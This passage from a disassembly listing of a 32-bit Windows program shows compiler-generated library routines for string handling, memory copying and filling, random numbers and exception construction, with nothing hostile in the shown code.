push dword ptr [ebp+8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push 1
rep movsd
call sub_421589
add esp, 0DCh
test eax, eax
jnz short loc_421B67
cmp [ebp+0Ch], eax
jnz short loc_421B67
push ebx
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push 3
rep movsd
call sub_421589
add esp, 0DCh
mov [ebp+0Ch], eax
loc_421B67: ; CODE XREF: .text:00421B3C�j
; .text:00421B41�j
push ebx
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push 3
rep movsd
call sub_421589
add esp, 0DCh
test eax, eax
jnz short loc_421B91
cmp [ebp+0Ch], eax
jz short loc_421B94
loc_421B91: ; CODE XREF: .text:00421B8A�j
xor eax, eax
inc eax
loc_421B94: ; CODE XREF: .text:00421B8F�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
lea eax, [ebp+10h]
push 1
push eax
call sub_401AB3
mov ebx, [ebp+0Ch]
pop ecx
pop ecx
lea esi, [ebp+10h]
push ebx
push dword ptr [ebp+8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push 0
rep movsd
call sub_421589
add esp, 0DCh
lea esi, [ebp+10h]
mov [ebp+0Ch], eax
push ebx
push dword ptr [ebp+8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push 0
rep movsd
call sub_421589
add esp, 0DCh
test eax, eax
jnz short loc_421C21
cmp [ebp+0Ch], eax
jnz short loc_421C21
push ebx
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push 2
rep movsd
call sub_421589
add esp, 0DCh
mov [ebp+0Ch], eax
loc_421C21: ; CODE XREF: .text:00421BF6�j
; .text:00421BFB�j
push ebx
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
push 2
rep movsd
call sub_421589
add esp, 0DCh
test eax, eax
jnz short loc_421C4B
cmp [ebp+0Ch], eax
jz short loc_421C4E
loc_421C4B: ; CODE XREF: .text:00421C44�j
xor eax, eax
inc eax
loc_421C4E: ; CODE XREF: .text:00421C49�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421C54 proc near ; CODE XREF: sub_417989+E8�p
jmp dword_42F0E8
sub_421C54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421C5A proc near ; CODE XREF: sub_417989+3F�p
jmp dword_42F0F0
sub_421C5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421C60 proc near ; CODE XREF: sub_417989+26�p
; sub_417A90+6D�p
jmp dword_42F0F4
sub_421C60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421C66 proc near ; CODE XREF: sub_417A90+21B�p
jmp dword_42F0F8
sub_421C66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421C6C proc near ; CODE XREF: sub_417A90+8B�p
jmp dword_42F0FC
sub_421C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_421C72 proc near ; CODE XREF: sub_4128D4+6E�p
; sub_41391C+65�p ...
jmp dword_42F224
sub_421C72 endp
; =============== S U B R O U T I N E =======================================
sub_421C78 proc near ; CODE XREF: sub_40D526+10�p
; sub_40F08A+6�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4230B3
pop ecx
retn
sub_421C78 endp
; =============== S U B R O U T I N E =======================================
sub_421C83 proc near ; CODE XREF: sub_40F3E1+D�p
mov eax, offset loc_42EF5C
call sub_423A68
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_40F143
mov esi, offset aStringTooLong ; "string too long"
push esi
call sub_422120
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_40F17B
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_40F1B0
lea eax, [ebp-3Ch]
push offset dword_430260
push eax
mov dword ptr [ebp-3Ch], offset off_42F348
call sub_423A87
pop esi
sub_421C83 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421CDD proc near ; CODE XREF: sub_421D1A+20�p
; DATA XREF: .text:00430264�o
mov eax, offset loc_42EF70
call sub_423A68
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_42F368
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_40F143
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_423BAB
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_421CDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421D1A proc near ; DATA XREF: .text:0042F350�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_421D53
lea eax, [ebp+var_1C]
push offset dword_430260
push eax
call sub_423A87
loc_421D37: ; DATA XREF: .text:off_42F348�o
push esi
mov esi, ecx
call sub_421CDD
test [esp+20h+var_18], 1
jz short loc_421D4D
push esi
call sub_421C78
pop ecx
loc_421D4D: ; CODE XREF: sub_421D1A+2A�j
mov eax, esi
pop esi
retn 4
sub_421D1A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421D53 proc near ; CODE XREF: sub_421D1A+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_40F389
mov dword ptr [esi], offset off_42F348
mov eax, esi
pop esi
retn 4
sub_421D53 endp
; =============== S U B R O U T I N E =======================================
sub_421D6B proc near ; CODE XREF: sub_40F210+13�p
; sub_40F2DD+E�p
; FUNCTION CHUNK AT 00421DFB SIZE 0000000C BYTES
mov eax, offset loc_42EF84
call sub_423A68
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_40F143
mov esi, offset aInvalidStringP ; "invalid string position"
push esi
call sub_422120
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_40F17B
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_40F1B0
lea eax, [ebp-3Ch]
push offset dword_4300C0
push eax
mov dword ptr [ebp-3Ch], offset off_42F378
call sub_423A87
pop esi
loc_421DC5: ; DATA XREF: .text:00432014�o
test byte_631764, 1
jnz short loc_421DD5
or byte_631764, 1
loc_421DD5: ; CODE XREF: sub_421D6B+61�j
call sub_421DEF
test byte_631765, 1
jnz short loc_421DEA
or byte_631765, 1
loc_421DEA: ; CODE XREF: sub_421D6B+76�j
jmp loc_421DFB
sub_421D6B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421DEF proc near ; CODE XREF: sub_421D6B:loc_421DD5�p
push offset nullsub_1
call sub_42321A
pop ecx
retn
sub_421DEF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D6B
loc_421DFB: ; CODE XREF: sub_421D6B:loc_421DEA�j
push offset nullsub_1
call sub_42321A
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_421D6B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_421E08 proc near ; CODE XREF: sub_416208+EC�p
; sub_416208+188�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_421E77
retn 4
sub_421E08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421E16 proc near ; CODE XREF: sub_416208+10B�p
; sub_416208+1FE�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_421E68
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_449390
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_421E68
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_421E68
lea eax, [ebp+var_4]
push eax
push 0
call dword_42F22C
test eax, eax
jz short loc_421E68
and [ebp+var_4], 0
loc_421E68: ; CODE XREF: sub_421E16+D�j
; sub_421E16+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_421E77
leave
retn 0Ch
sub_421E16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421E77 proc near ; CODE XREF: sub_421E08+6�p
; sub_421E16+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_421E9B
lea eax, [ebp+var_10]
push offset dword_430310
push eax
call sub_423A87
sub_421E77 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421E9B proc near ; CODE XREF: sub_421E77+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_42F3A0
test eax, eax
mov [esi+8], eax
jz short loc_421EC7
cmp [esp+4+arg_8], 0
jz short loc_421EC7
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_421EC7: ; CODE XREF: sub_421E9B+1D�j
; sub_421E9B+24�j
mov eax, esi
pop esi
retn 0Ch
sub_421E9B endp
; =============== S U B R O U T I N E =======================================
sub_421ECD proc near ; DATA XREF: .text:off_42F3A0�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_421F16
test [esp+4+arg_0], 1
jz short loc_421EE3
push esi
call sub_421C78
pop ecx
loc_421EE3: ; CODE XREF: sub_421ECD+D�j
mov eax, esi
pop esi
retn 4
sub_421ECD endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_42F3A0
jz short loc_421F10
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_421F10: ; CODE XREF: .text:00421F08�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_421F16 proc near ; CODE XREF: sub_421ECD+3�p
; DATA XREF: .text:00430314�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_42F3A0
test eax, eax
jz short loc_421F2C
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_421F2C: ; CODE XREF: sub_421F16+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_421F3A
push esi
call dword_42F030 ; LocalFree
loc_421F3A: ; CODE XREF: sub_421F16+1B�j
pop esi
retn
sub_421F16 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_421F40 proc near ; CODE XREF: start+66�p start+B4�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_421FF4
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_421F6A
loc_421F5B: ; CODE XREF: sub_421F40+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_421F9B
test edi, 3
jnz short loc_421F5B
loc_421F6A: ; CODE XREF: sub_421F40+19�j
; sub_421F40+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_421F6A
mov eax, [edi-4]
test al, al
jz short loc_421FA8
test ah, ah
jz short loc_421FA3
test eax, 0FF0000h
jz short loc_421F9E
test eax, 0FF000000h
jnz short loc_421F6A
loc_421F9B: ; CODE XREF: sub_421F40+20�j
dec edi
jmp short loc_421FAB
; ---------------------------------------------------------------------------
loc_421F9E: ; CODE XREF: sub_421F40+52�j
sub edi, 2
jmp short loc_421FAB
; ---------------------------------------------------------------------------
loc_421FA3: ; CODE XREF: sub_421F40+4B�j
sub edi, 3
jmp short loc_421FAB
; ---------------------------------------------------------------------------
loc_421FA8: ; CODE XREF: sub_421F40+47�j
sub edi, 4
loc_421FAB: ; CODE XREF: sub_421F40+5C�j
; sub_421F40+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_421FC0
mov ebx, ecx
shr ecx, 2
jnz short loc_42200C
jmp short loc_421FDC
; ---------------------------------------------------------------------------
loc_421FC0: ; CODE XREF: sub_421F40+75�j
; sub_421F40+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_421FFA
mov [edi], dl
inc edi
dec ecx
jz short loc_421FF0
test esi, 3
jnz short loc_421FC0
mov ebx, ecx
shr ecx, 2
jnz short loc_42200C
loc_421FDC: ; CODE XREF: sub_421F40+7E�j
; sub_421F40+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_421FF0
loc_421FE3: ; CODE XREF: sub_421F40+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_421FF2
dec ecx
jnz short loc_421FE3
loc_421FF0: ; CODE XREF: sub_421F40+8B�j
; sub_421F40+A1�j
mov [edi], cl
loc_421FF2: ; CODE XREF: sub_421F40+AB�j
pop ebx
pop esi
loc_421FF4: ; CODE XREF: sub_421F40+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_421FFA: ; CODE XREF: sub_421F40+85�j
; sub_421F40+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_422004: ; CODE XREF: sub_421F40+E4�j
; sub_421F40+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_421FDC
loc_42200C: ; CODE XREF: sub_421F40+7C�j
; sub_421F40+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_422004
test dl, dl
jz short loc_421FFA
test dh, dh
jz short loc_422058
test edx, 0FF0000h
jz short loc_422048
test edx, 0FF000000h
jnz short loc_422004
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_422048: ; CODE XREF: sub_421F40+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_422058: ; CODE XREF: sub_421F40+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_421F40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422063 proc near ; CODE XREF: start+22�p start+52�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_42512C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_4220A3
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4220B0
; ---------------------------------------------------------------------------
loc_4220A3: ; CODE XREF: sub_422063+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_425014
pop ecx
pop ecx
loc_4220B0: ; CODE XREF: sub_422063+3E�j
mov eax, esi
pop esi
leave
retn
sub_422063 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4220C0 proc near ; CODE XREF: start+8�p sub_401AB3+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4220E0
loc_4220CC: ; CODE XREF: sub_4220C0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4220CC
loc_4220E0: ; CODE XREF: sub_4220C0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4220C0 endp
; =============== S U B R O U T I N E =======================================
sub_4220EF proc near ; CODE XREF: sub_4010E7+9�p
; sub_401477+45�p ...
arg_0 = dword ptr 4
call sub_42599D
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_4220EF endp
; =============== S U B R O U T I N E =======================================
sub_4220FC proc near ; CODE XREF: sub_4010E7+F�p
; sub_4010E7+22�p ...
call sub_42599D
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_4220FC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_422120 proc near ; CODE XREF: sub_401160+12B�p
; sub_401160+170�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_422140
loc_42212C: ; CODE XREF: sub_422120+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_422173
test ecx, 3
jnz short loc_42212C
add eax, 0
loc_422140: ; CODE XREF: sub_422120+A�j
; sub_422120+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_422140
mov eax, [ecx-4]
test al, al
jz short loc_422191
test ah, ah
jz short loc_422187
test eax, 0FF0000h
jz short loc_42217D
test eax, 0FF000000h
jz short loc_422173
jmp short loc_422140
; ---------------------------------------------------------------------------
loc_422173: ; CODE XREF: sub_422120+11�j
; sub_422120+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_42217D: ; CODE XREF: sub_422120+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_422187: ; CODE XREF: sub_422120+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_422191: ; CODE XREF: sub_422120+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_422120 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42219B proc near ; CODE XREF: sub_401160+11B�p
; sub_401160+160�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_42512C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_4221DA
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4221E7
; ---------------------------------------------------------------------------
loc_4221DA: ; CODE XREF: sub_42219B+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_425014
pop ecx
pop ecx
loc_4221E7: ; CODE XREF: sub_42219B+3D�j
mov eax, esi
pop esi
leave
retn
sub_42219B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4221F0 proc near ; CODE XREF: sub_401160+15�p
; sub_401311+1D�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_422243
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_422237
neg ecx
and ecx, 3
jz short loc_422219
sub edx, ecx
loc_422213: ; CODE XREF: sub_4221F0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_422213
loc_422219: ; CODE XREF: sub_4221F0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_422237
rep stosd
test edx, edx
jz short loc_42223D
loc_422237: ; CODE XREF: sub_4221F0+18�j
; sub_4221F0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_422237
loc_42223D: ; CODE XREF: sub_4221F0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_422243: ; CODE XREF: sub_4221F0+A�j
mov eax, [esp+arg_0]
retn
sub_4221F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422248 proc near ; CODE XREF: sub_401311+3A�p
; sub_401311+53�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
call sub_42599D
push 8
mov [ebp+arg_4], eax
pop ecx
xor eax, eax
lea edi, [ebp+var_20]
push 7
rep stosd
pop edi
loc_422269: ; CODE XREF: sub_422248+3A�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_422269
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_422291
mov eax, [ebp+arg_4]
mov edx, [eax+18h]
loc_422291: ; CODE XREF: sub_422248+41�j
; sub_422248+67�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4222B1
test al, al
jz short loc_4222B1
inc edx
jmp short loc_422291
; ---------------------------------------------------------------------------
loc_4222B1: ; CODE XREF: sub_422248+60�j
; sub_422248+64�j
mov ebx, edx
loc_4222B3: ; CODE XREF: sub_422248+89�j
mov al, [edx]
test al, al
jz short loc_4222D7
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_4222D3
inc edx
jmp short loc_4222B3
; ---------------------------------------------------------------------------
loc_4222D3: ; CODE XREF: sub_422248+86�j
and byte ptr [edx], 0
inc edx
loc_4222D7: ; CODE XREF: sub_422248+6F�j
mov eax, [ebp+arg_4]
pop edi
pop esi
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
and eax, ebx
pop ebx
leave
retn
sub_422248 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4222F0 proc near ; CODE XREF: sub_401311+2B�p
; sub_401477+93�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_422373
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_422314
shr ecx, 2
jnz short loc_422381
jmp short loc_422335
; ---------------------------------------------------------------------------
loc_422314: ; CODE XREF: sub_4222F0+1B�j
; sub_4222F0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_422342
test al, al
jz short loc_42234A
test esi, 3
jnz short loc_422314
mov ebx, ecx
shr ecx, 2
jnz short loc_422381
loc_422330: ; CODE XREF: sub_4222F0+8F�j
and ebx, 3
jz short loc_422342
loc_422335: ; CODE XREF: sub_4222F0+22�j
; sub_4222F0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_42236E
dec ebx
jnz short loc_422335
loc_422342: ; CODE XREF: sub_4222F0+2B�j
; sub_4222F0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_42234A: ; CODE XREF: sub_4222F0+2F�j
test edi, 3
jz short loc_422364
loc_422352: ; CODE XREF: sub_4222F0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4223E6
test edi, 3
jnz short loc_422352
loc_422364: ; CODE XREF: sub_4222F0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4223D7
loc_42236B: ; CODE XREF: sub_4222F0+7F�j
; sub_4222F0+F4�j
mov [edi], al
inc edi
loc_42236E: ; CODE XREF: sub_4222F0+4D�j
dec ebx
jnz short loc_42236B
pop ebx
pop esi
loc_422373: ; CODE XREF: sub_4222F0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_422379: ; CODE XREF: sub_4222F0+A9�j
; sub_4222F0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_422330
loc_422381: ; CODE XREF: sub_4222F0+20�j
; sub_4222F0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_422379
test dl, dl
jz short loc_4223CB
test dh, dh
jz short loc_4223C1
test edx, 0FF0000h
jz short loc_4223B7
test edx, 0FF000000h
jnz short loc_422379
mov [edi], edx
jmp short loc_4223CF
; ---------------------------------------------------------------------------
loc_4223B7: ; CODE XREF: sub_4222F0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4223CF
; ---------------------------------------------------------------------------
loc_4223C1: ; CODE XREF: sub_4222F0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4223CF
; ---------------------------------------------------------------------------
loc_4223CB: ; CODE XREF: sub_4222F0+AD�j
xor edx, edx
mov [edi], edx
loc_4223CF: ; CODE XREF: sub_4222F0+C5�j
; sub_4222F0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4223E1
loc_4223D7: ; CODE XREF: sub_4222F0+79�j
xor eax, eax
loc_4223D9: ; CODE XREF: sub_4222F0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4223D9
loc_4223E1: ; CODE XREF: sub_4222F0+E5�j
and ebx, 3
jnz short loc_42236B
loc_4223E6: ; CODE XREF: sub_4222F0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4222F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4223F0 proc near ; CODE XREF: sub_4015B4+15�p
; sub_4015B4+3B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_422410
cmp edi, eax
jb loc_422588
loc_422410: ; CODE XREF: sub_4223F0+16�j
test edi, 3
jnz short loc_42242C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_42244C
rep movsd
jmp off_422538[edx*4]
; ---------------------------------------------------------------------------
loc_42242C: ; CODE XREF: sub_4223F0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_422444
and eax, 3
add ecx, eax
jmp dword ptr loc_42244C+4[eax*4]
; ---------------------------------------------------------------------------
loc_422444: ; CODE XREF: sub_4223F0+46�j
jmp dword ptr loc_422548[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_42244C: ; CODE XREF: sub_4223F0+31�j
; sub_4223F0+8E�j ...
jmp off_4224CC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_422460
dd offset loc_42248C
dd offset loc_4224B0
; ---------------------------------------------------------------------------
loc_422460: ; DATA XREF: sub_4223F0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_42244C
rep movsd
jmp off_422538[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_42248C: ; DATA XREF: sub_4223F0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_42244C
rep movsd
jmp off_422538[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4224B0: ; DATA XREF: sub_4223F0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
